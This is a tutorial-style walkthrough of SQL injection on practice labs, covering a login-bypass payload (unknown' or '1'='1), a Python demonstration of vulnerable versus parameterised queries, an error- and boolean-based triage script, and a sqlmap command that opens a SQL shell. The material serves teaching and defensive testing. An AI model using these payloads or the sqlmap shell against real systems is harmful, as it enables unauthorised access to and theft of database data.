Identifying SQL injection (SQLi) on codingame.com and http://testphp.vulnweb.com/
--
What is SQL injection?
SQL injection is a web security vulnerability that allows an attacker to interfere with the queries that an application makes to its database. It generally allows an attacker to view data that they are not normally able to retrieve. This might include data belonging to other users, or any other data that the application itself is able to access. In many cases, an attacker can modify or delete this data, causing persistent changes to the application's content or behavior. (source: PortSwigger Web Security Academy, https://portswigger.net/web-security/sql-injection)
Let's practice on the lab: https://www.codingame.com/playgrounds/154/sql-injection-demo/sql-injection. I learnt about these vulnerabilities and labs from Rohit Gautam and Shifa Cyclewala.
Go check their YouTube channel.
Now let's begin.
The lab account has username admin and password admin123. Logging in should require both the correct username and the correct password, but because of the SQL injection the account can be opened without knowing the real password. What we enter in the password field is: unknown' or '1'='1
Let's enter that and see what happens.
We used: Username = admin
and Password = unknown' or '1'='1
Boom! We got access to the administrator account without knowing the password, by entering a wrong one.
Let's understand why the application granted access. The login concatenates both fields into its query, so the WHERE clause becomes:
username='admin' AND password='unknown' OR '1'='1'
AND binds tighter than OR, so the condition is evaluated as (username='admin' AND password='unknown') OR '1'='1':
true and false or true
false or true
true
The condition is true for every row, so the query returns the user table and the application treats the first row (admin) as a successful login.
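The same login logic in runnable form, as an added example that is not the lab's own code: a throwaway in-memory SQLite table holding the admin/admin123 credentials, the vulnerable query built by string concatenation, and the parameterised version that defeats the payload. The table, column and function names are this example's assumptions.

```python
import sqlite3

PAYLOAD = "unknown' or '1'='1"  # the password-field payload from the walkthrough


def make_db() -> sqlite3.Connection:
    """Constructed stand-in for the lab's user table (assumed schema)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', 'admin123')")
    conn.commit()
    return conn


def build_query(username: str, password: str) -> str:
    """The SQL text a concatenating login sends: user input becomes part of the statement."""
    return (
        "SELECT username FROM users WHERE username = '" + username
        + "' AND password = '" + password + "'"
    )


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str) -> bool:
    # Quotes inside the input close the string literal, so ' or '1'='1 becomes SQL.
    # AND binds tighter than OR, so the WHERE clause is true for every row.
    row = conn.execute(build_query(username, password)).fetchone()
    return row is not None


def login_safe(conn: sqlite3.Connection, username: str, password: str) -> bool:
    # Parameterised query: the driver sends the values separately from the SQL,
    # so a quote in the password is compared as data, never parsed as syntax.
    row = conn.execute(
        "SELECT username FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row is not None


if __name__ == "__main__":
    db = make_db()
    print(build_query("admin", PAYLOAD))
    print("vulnerable login with payload:", login_vulnerable(db, "admin", PAYLOAD))
    print("parameterised login with payload:", login_safe(db, "admin", PAYLOAD))
```

Printing `build_query` shows exactly the statement the database receives; the parameterised version accepts admin/admin123 and rejects the payload because `'1'='1` is now just part of a (wrong) password string.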
Where can the query be injected?
- In a GET request (URL parameters)
- In a POST request (form fields, JSON bodies)
- In headers (User-Agent, Referer and similar values that get logged or stored)
- In cookies
How to approach the target?
- Fuzz the application parameters
- Identify the injectable parameters
- Check which component is vulnerable
- Attack with SQLi
SQL injection at http://testphp.vulnweb.com/
Here the injection point is the cat URL parameter:
testphp.vulnweb.com/listproducts.php?cat=2
Let's see what happens when we send 2' as the value of the cat parameter.
The page returns a database error, which shows that the single quote reached the SQL query unescaped: this parameter is injectable. A database error is strong evidence, but confirm it before reporting, for example by checking that cat=2 AND 1=1 returns the normal product list while cat=2 AND 1=2 returns an empty one.
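The "fuzz the parameters, identify the injectable one, check it" steps above and this error-based observation can be wired into a small triage routine. The following is an added example, not the original page's or the site's code: it recognises the syntax-error text the common engines emit when a stray quote breaks a statement, sends a quote probe plus a boolean true/false pair, and only calls the finding confirmed when both lines of evidence agree. The `fetch` callback is whatever issues the request (requests, curl, Burp); here it is fed constructed responses so the example runs offline, and the response bodies are made up for the example, not captured from testphp.vulnweb.com.

```python
import re
from typing import Callable, Optional

# Fragments the common engines print on a broken statement. The messages are the
# engines' own wording; grouping them per DBMS is this example's choice.
SQL_ERROR_SIGNATURES = {
    "MySQL": [r"You have an error in your SQL syntax",
              r"MySQL server version for the right syntax"],
    "PostgreSQL": [r"unterminated quoted string at or near", r"PG::SyntaxError"],
    "Microsoft SQL Server": [r"Unclosed quotation mark after the character string",
                             r"Incorrect syntax near"],
    "Oracle": [r"ORA-0(0933|1756)", r"quoted string not properly terminated"],
    "SQLite": [r"unrecognized token:", r"SQLITE_ERROR"],
}


def detect_sql_error(body: str) -> Optional[str]:
    """Return the DBMS whose error text appears in the response body, else None."""
    for dbms, patterns in SQL_ERROR_SIGNATURES.items():
        if any(re.search(p, body, re.IGNORECASE) for p in patterns):
            return dbms
    return None


def probe_values(original: str) -> dict[str, str]:
    """Values to substitute for the original parameter value, keyed by purpose."""
    return {
        "quote": original + "'",        # break the quoting: a DB error means it reached the query
        "true": original + " AND 1=1",  # should render like the original page
        "false": original + " AND 1=2", # should differ (e.g. an empty product list)
    }


def triage(original: str, fetch: Callable[[str], str]) -> dict:
    """Run the probes through fetch(value) -> body and summarise the evidence."""
    baseline = fetch(original)
    probes = probe_values(original)
    dbms = detect_sql_error(fetch(probes["quote"]))
    boolean_diff = fetch(probes["true"]) == baseline and fetch(probes["false"]) != baseline
    # An error alone says the quote reached the query; a boolean difference says the
    # input controls the WHERE clause. Treat the finding as confirmed only with both.
    if dbms and boolean_diff:
        verdict = "confirmed"
    elif dbms or boolean_diff:
        verdict = "probable"
    else:
        verdict = "none"
    return {"dbms": dbms, "error_on_quote": dbms is not None,
            "boolean_diff": boolean_diff, "verdict": verdict}


# Constructed responses standing in for listproducts.php; not captured from the real site.
PRODUCT_PAGE = "<h2>Products</h2><ul><li>Laptop</li><li>Phone</li></ul>"
EMPTY_PAGE = "<h2>Products</h2><ul></ul>"
MYSQL_ERROR = ("Error: You have an error in your SQL syntax; check the manual that corresponds "
               "to your MySQL server version for the right syntax to use near ''' at line 1")
CONSTRUCTED_RESPONSES = {
    "2": PRODUCT_PAGE,
    "2'": MYSQL_ERROR,
    "2 AND 1=1": PRODUCT_PAGE,
    "2 AND 1=2": EMPTY_PAGE,
}


def fake_fetch(value: str) -> str:
    """Offline stand-in for GET listproducts.php?cat=<value>."""
    return CONSTRUCTED_RESPONSES.get(value, PRODUCT_PAGE)


if __name__ == "__main__":
    print(triage("2", fake_fetch))
```

Against a live target, swap `fake_fetch` for a function that URL-encodes the value into the parameter and returns the response body; the boolean pair is what separates a real injection from an application that simply throws a generic error page on any odd input.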
Bonus Section
===
To get a SQL shell with sqlmap, run:
python sqlmap.py -u "http://example.com/?id=1" -p id --sql-shell
-p restricts testing to the id parameter, and --sql-shell opens an interactive prompt that runs SQL statements through the injection once sqlmap has confirmed it.
Enjoy!
Contact
If you want to connect on Facebook→ UJJWAL GAUTAM :)